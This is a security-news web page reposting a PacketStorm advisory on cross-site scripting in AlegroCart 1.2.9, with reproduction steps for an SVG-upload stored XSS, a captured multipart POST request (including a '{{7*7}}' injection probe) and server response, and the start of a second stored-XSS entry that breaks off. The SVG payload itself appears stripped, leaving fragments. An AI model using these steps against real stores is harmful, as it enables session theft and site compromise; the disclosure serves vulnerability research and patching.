AlegroCart 1.2.9 Cross Site Scripting

Exploit Details

Basic Information

Exploit Title	AlegroCart 1.2.9 Cross Site Scripting
Exploit ID	PACKETSTORM:190656
Type	packetstorm
Published	2025-04-24T00:00:00
Modified	2025-04-24T00:00:00
CVSS Information

CVSS Score	0.0
Severity	NONE
Vector	NONE
CVE Information

Exploit Description

AlegroCart……
Exploit Code

# Exploit Title: XSS via SVG Image Upload – alegrocartv1.2.9
    # Date: 04/2025
    # Exploit Author: Andrey Stoykov
    # Version: 1.2.9
    # Tested on: Debian 12
    # Blog: https://msecureltd.blogspot.com/
    XSS via SVG Image Upload:
    Steps to Reproduce:
    1. Visit http://192.168.58.129/alegrocart/administrator/?controller=download
    2. Upload SVG image file with the contents below
    3. Intercept the POST request and change the Content-Type to “Content-Type:
    image/jpg”
    4. Then visit “http://192.168.58.129/alegrocart/download/xss.svg” to
    trigger the XSS
    
        
            
                    placeholder=”Type here…”/>
            
        
    
    // HTTP POST request
    POST /alegrocart/administrator/?controller=download&action=insert HTTP/1.1
    Host: 192.168.58.129
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0)
    Gecko/20100101 Firefox/138.0
    […]
    ——geckoformboundary15d78a6e0de83d7fc006c8ad803bfefc
    Content-Disposition: form-data; name=”language[1][name]”
    {{7*7}}
    ——geckoformboundary15d78a6e0de83d7fc006c8ad803bfefc
    Content-Disposition: form-data; name=”fileName”
    xss.svg
    ——geckoformboundary15d78a6e0de83d7fc006c8ad803bfefc
    Content-Disposition: form-data; name=”download”; filename=”xss.svg”
    Content-Type: image/jpg
    
        
            
                    placeholder=”Type here…”/>
            
        
    
    ——geckoformboundary15d78a6e0de83d7fc006c8ad803bfefc
    Content-Disposition: form-data; name=”mask”
    6760664742675684.svg
    ——geckoformboundary15d78a6e0de83d7fc006c8ad803bfefc
    Content-Disposition: form-data; name=”remaining”
    1
    ——geckoformboundary15d78a6e0de83d7fc006c8ad803bfefc
    Content-Disposition: form-data; name=”79d45153379f999ff64e1198b05faae6″
    586fdeeeaf42c0c557291be4d32afe11
    ——geckoformboundary15d78a6e0de83d7fc006c8ad803bfefc–
    // HTTP Response
    HTTP/1.1 302 Found
    Date: Thu, 03 Apr 2025 20:42:59 GMT
    Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev
    Perl/v5.16.3
    X-Powered-By: PHP/5.6.40
    Location:
    http://192.168.58.129/alegrocart/administrator/?controller=download
    Cache-Control: max-age=0, private, no-store, no-cache, must-revalidate
    Expires: Thu, 03 Apr 2025 20:42:59 GMT
    Content-Length: 0
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
    # Exploit Title: Stored XSS in “Message” Functionality – alegrocartv1.2.9
    # Date: 04/2025
    # Exploit Author: Andrey Stoykov
    # Version: 1.2.9
    # Tested on: Debian 12
    # Blog: https://msecureltd.blogspot.com/
    Stored XSS #1:
    Steps to Reproduce:
    1. Login as demonstrator account and visit “Customers” > “Newsletter”
    2. In “Message” use the following XSS payload
    View Full Exploit Details</a></p>
                </div>

                <footer class="entry-footer">
                    <div class="entry-tags"><span class="tags-label">Tags</span><div class="tag-list"><a href="https://zero.redgem.net/?tag=cve" rel="tag">CVE</a><a href="https://zero.redgem.net/?tag=cvss" rel="tag">CVSS</a><a href="https://zero.redgem.net/?tag=cvss-0.0" rel="tag">CVSS-0.0</a><a href="https://zero.redgem.net/?tag=exploit" rel="tag">exploit</a><a href="https://zero.redgem.net/?tag=news" rel="tag">news</a><a href="https://zero.redgem.net/?tag=none" rel="tag">NONE</a><a href="https://zero.redgem.net/?tag=packetstorm" rel="tag">packetstorm</a><a href="https://zero.redgem.net/?tag=security" rel="tag">Security</a><a href="https://zero.redgem.net/?tag=tapic" rel="tag">tapic</a><a href="https://zero.redgem.net/?tag=vulnerability" rel="tag">Vulnerability</a></div></div>
                    <div class="post-navigation">
                                                <div class="post-nav-grid">
                                                            <a href="https://zero.redgem.net/?p=1418" class="post-nav-link post-nav-prev">
                                    <span class="post-nav-dir">
                                        <svg width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><path d="m15 18-6-6 6-6"/></svg>
                                        Previous
                                    </span>
                                    <span class="post-nav-title">Gladinet CentreStack 16.1.10296.56315 Remote Code Execution</span>
                                </a>
                                                                                        <a href="https://zero.redgem.net/?p=1420" class="post-nav-link post-nav-next">
                                    <span class="post-nav-dir">
                                        Next
                                        <svg width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><path d="m9 18 6-6-6-6"/></svg>
                                    </span>
                                    <span class="post-nav-title">Bighuge BLS OSINT Tool 2.1.0 Local Privilege Escalation</span>
                                </a>
                                                    </div>
                                            </div>
                </footer>

                <!-- RedGem CTA -->
                <aside class="redgem-cta-card">
                    <div class="cta-inner">
                        <div class="cta-text">
                            <h3>Stay Protected with RedGem</h3>
                            <p>AI-powered attack surface monitoring, dark web intelligence, and vulnerability scanning in one platform.</p>
                        </div>
                        <div class="cta-actions">
                            <a href="https://www.redgem.net" class="btn-primary" target="_blank" rel="noopener">Start Free Trial</a>
                            <a href="https://www.redgem.net/demo" class="btn-secondary" target="_blank" rel="noopener">Request Demo</a>
                        </div>
                    </div>
                </aside>
            </article>

            
<div id="comments" class="comments-area">

    
    
    	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">💭 Join the Security Discussion <small><a rel="nofollow" id="cancel-comment-reply-link" href="/?p=1419#respond" style="display:none;">❌ Cancel Reply</a></small></h3><form action="https://zero.redgem.net/wp-comments-post.php" method="post" id="commentform" class="comment-form security-comment-form"><div class="comment-notes">
                                    <p>🔒 Your email address will not be published. Required fields are marked <span class="required">*</span></p>
                                    <p>⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.</p>
                                </div><div class="comment-form-comment">
                                    <label for="comment">💬 Your Comment <span class="required">*</span></label>
                                    <textarea id="comment" name="comment" cols="45" rows="8" maxlength="65525" required="required" placeholder="Share your thoughts on this security advisory..."></textarea>
                                </div><div class="comment-form-author">
                        <label for="author">👤 Name </label>
                        <input id="author" name="author" type="text" value="" size="30" maxlength="245" />
                    </div>
<div class="comment-form-email">
                        <label for="email">📧 Email </label>
                        <input id="email" name="email" type="email" value="" size="30" maxlength="100" />
                    </div>
<div class="comment-form-url">
                        <label for="url">🌐 Website</label>
                        <input id="url" name="url" type="url" value="" size="30" maxlength="200" />
                    </div>
<p class="comment-form-cookies-consent"><input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes" /> <label for="wp-comment-cookies-consent">Save my name, email, and website in this browser for the next time I comment.</label></p>
<div class="g-recaptcha" style="transform: scale(0.9); -webkit-transform: scale(0.9); transform-origin: 0 0; -webkit-transform-origin: 0 0;" data-sitekey="6LejfrMsAAAAAMk9PFMJ2LRof2S86gzzKEJO8mZX"></div><script src='https://www.google.com/recaptcha/api.js?ver=1.34' id='wpcaptcha-recaptcha-js'></script><p class="form-submit"><input name="submit" type="submit" id="submit" class="submit-comment-btn" value="📤 Post Comment" /> <input type='hidden' name='comment_post_ID' value='1419' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p></form>	</div><!-- #respond -->
	
</div>

 
            </div>
</div>


        </main><!-- #primary -->
    </div><!-- #content -->

    <footer id="colophon" class="site-footer">
        <div class="footer-accent"></div>

        <div class="container">
            <div class="footer-top">
                <div class="footer-brand">
                                            <div class="footer-logo">
                            <img src="https://www.redgem.net/logo.png" alt="zero redgem" width="100" height="80" class="footer-logo-img" />
                        </div>
                                        <p class="footer-tagline">Your trusted source for security vulnerabilities, exploits, and CVE intelligence. Part of the RedGem security platform.</p>

                    <div class="footer-social">
                        <a href="#" aria-label="Twitter" title="Follow us on Twitter">
                            <svg width="16" height="16" viewBox="0 0 24 24" fill="currentColor"><path d="M18.244 2.25h3.308l-7.227 8.26 8.502 11.24H16.17l-5.214-6.817L4.99 21.75H1.68l7.73-8.835L1.254 2.25H8.08l4.713 6.231zm-1.161 17.52h1.833L7.084 4.126H5.117z"/></svg>
                        </a>
                        <a href="#" aria-label="GitHub" title="View on GitHub">
                            <svg width="16" height="16" viewBox="0 0 24 24" fill="currentColor"><path d="M12 0c-6.626 0-12 5.373-12 12 0 5.302 3.438 9.8 8.207 11.387.599.111.793-.261.793-.577v-2.234c-3.338.726-4.033-1.416-4.033-1.416-.546-1.387-1.333-1.756-1.333-1.756-1.089-.745.083-.729.083-.729 1.205.084 1.839 1.237 1.839 1.237 1.07 1.834 2.807 1.304 3.492.997.107-.775.418-1.305.762-1.604-2.665-.305-5.467-1.334-5.467-5.931 0-1.311.469-2.381 1.236-3.221-.124-.303-.535-1.524.117-3.176 0 0 1.008-.322 3.301 1.23A11.509 11.509 0 0112 5.803c1.02.005 2.047.138 3.006.404 2.291-1.552 3.297-1.23 3.297-1.23.653 1.653.242 2.874.118 3.176.77.84 1.235 1.911 1.235 3.221 0 4.609-2.807 5.624-5.479 5.921.43.372.823 1.102.823 2.222v3.293c0 .319.192.694.801.576C20.566 21.797 24 17.3 24 12c0-6.627-5.373-12-12-12z"/></svg>
                        </a>
                        <a href="https://zero.redgem.net/?feed=rss2" aria-label="RSS Feed" title="RSS Feed">
                            <svg width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M4 11a9 9 0 0 1 9 9"/><path d="M4 4a16 16 0 0 1 16 16"/><circle cx="5" cy="19" r="1"/></svg>
                        </a>
                    </div>
                </div>

                <div class="footer-links-grid">
                    <div class="footer-section">
                        <h4>Quick Links</h4>
                        <ul>
                            <li><a href="https://zero.redgem.net/">Home</a></li>
                            <li><a href="https://zero.redgem.net/?s=">Search</a></li>
                                                    </ul>
                    </div>

                    <div class="footer-section">
                        <h4>RedGem Platform</h4>
                        <ul>
                            <li><a href="https://www.redgem.net" target="_blank" rel="noopener">Main Platform</a></li>
                            <li><a href="https://www.redgem.net" target="_blank" rel="noopener">Asset Discovery</a></li>
                            <li><a href="https://www.redgem.net" target="_blank" rel="noopener">Leakage Detection</a></li>
                            <li><a href="https://www.redgem.net" target="_blank" rel="noopener">Vulnerability Scanners</a></li>
                        </ul>
                    </div>

                    <div class="footer-section">
                        <h4>Security Resources</h4>
                        <ul>
                            <li><a href="https://cve.mitre.org/" target="_blank" rel="noopener">CVE Database</a></li>
                            <li><a href="https://nvd.nist.gov/" target="_blank" rel="noopener">NVD</a></li>
                            <li><a href="https://www.exploit-db.com/" target="_blank" rel="noopener">Exploit-DB</a></li>
                            <li><a href="https://www.securityfocus.com/" target="_blank" rel="noopener">SecurityFocus</a></li>
                        </ul>
                    </div>
                </div>
            </div>

            <div class="footer-bottom">
                <div class="footer-info">
                    <p>&copy; 2026 zero redgem. All rights reserved.</p>
                    <p>Powered by <a href="https://wordpress.org/" target="_blank" rel="noopener">WordPress</a> &middot; RedGem Security Theme</p>
                </div>

                <div class="footer-badges">
                    <span class="footer-badge">
                        <svg width="12" height="12" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><path d="M12 22s8-4 8-10V5l-8-3-8 3v7c0 6 8 10 8 10z"/></svg>
                        Secured
                    </span>
                    <span class="footer-badge">
                        <svg width="12" height="12" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"><path d="M22 11.08V12a10 10 0 1 1-5.93-9.14"/><polyline points="22 4 12 14.01 9 11.01"/></svg>
                        Verified Data
                    </span>
                </div>
            </div>
        </div>
    </footer>
</div><!-- #page -->

<script id="security-news-script-js-extra">
var securityNewsAjax = {"ajaxurl":"//zero.redgem.net/wp-admin/admin-ajax.php","nonce":"e6883ca11c"};
//# sourceURL=security-news-script-js-extra
</script>
<script src="https://zero.redgem.net/wp-content/themes/security-news/js/theme.js?ver=2.14.0" id="security-news-script-js"></script>
<script id="wp-emoji-settings" type="application/json">
{"baseUrl":"https://s.w.org/images/core/emoji/17.0.2/72x72/","ext":".png","svgUrl":"https://s.w.org/images/core/emoji/17.0.2/svg/","svgExt":".svg","source":{"concatemoji":"https://zero.redgem.net/wp-includes/js/wp-emoji-release.min.js?ver=6.9.4"}}
</script>
<script type="module">
/*! This file is auto-generated */
const a=JSON.parse(document.getElementById("wp-emoji-settings").textContent),o=(window._wpemojiSettings=a,"wpEmojiSettingsSupports"),s=["flag","emoji"];function i(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function c(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0);const a=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);return t.every((e,t)=>e===a[t])}function p(e,t){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var n=e.getImageData(16,16,1,1);for(let e=0;e<n.data.length;e++)if(0!==n.data[e])return!1;return!0}function u(e,t,n,a){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\udde8\ud83c\uddf6","\ud83c\udde8\u200b\ud83c\uddf6")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!a(e,"\ud83e\u1fac8")}return!1}function f(e,t,n,a){let r;const o=(r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):document.createElement("canvas")).getContext("2d",{willReadFrequently:!0}),s=(o.textBaseline="top",o.font="600 32px Arial",{});return e.forEach(e=>{s[e]=t(o,e,n,a)}),s}function r(e){var t=document.createElement("script");t.src=e,t.defer=!0,document.head.appendChild(t)}a.supports={everything:!0,everythingExceptFlag:!0},new Promise(t=>{let n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),c.toString(),p.toString()].join(",")+"));",a=new Blob([e],{type:"text/javascript"});const r=new Worker(URL.createObjectURL(a),{name:"wpTestEmojiSupports"});return void(r.onmessage=e=>{i(n=e.data),r.terminate(),t(n)})}catch(e){}i(n=f(s,u,c,p))}t(n)}).then(e=>{for(const n in e)a.supports[n]=e[n],a.supports.everything=a.supports.everything&&a.supports[n],"flag"!==n&&(a.supports.everythingExceptFlag=a.supports.everythingExceptFlag&&a.supports[n]);var t;a.supports.everythingExceptFlag=a.supports.everythingExceptFlag&&!a.supports.flag,a.supports.everything||((t=a.source||{}).concatemoji?r(t.concatemoji):t.wpemoji&&t.twemoji&&(r(t.twemoji),r(t.wpemoji)))});
//# sourceURL=https://zero.redgem.net/wp-includes/js/wp-emoji-loader.min.js
</script>

</body>
</html>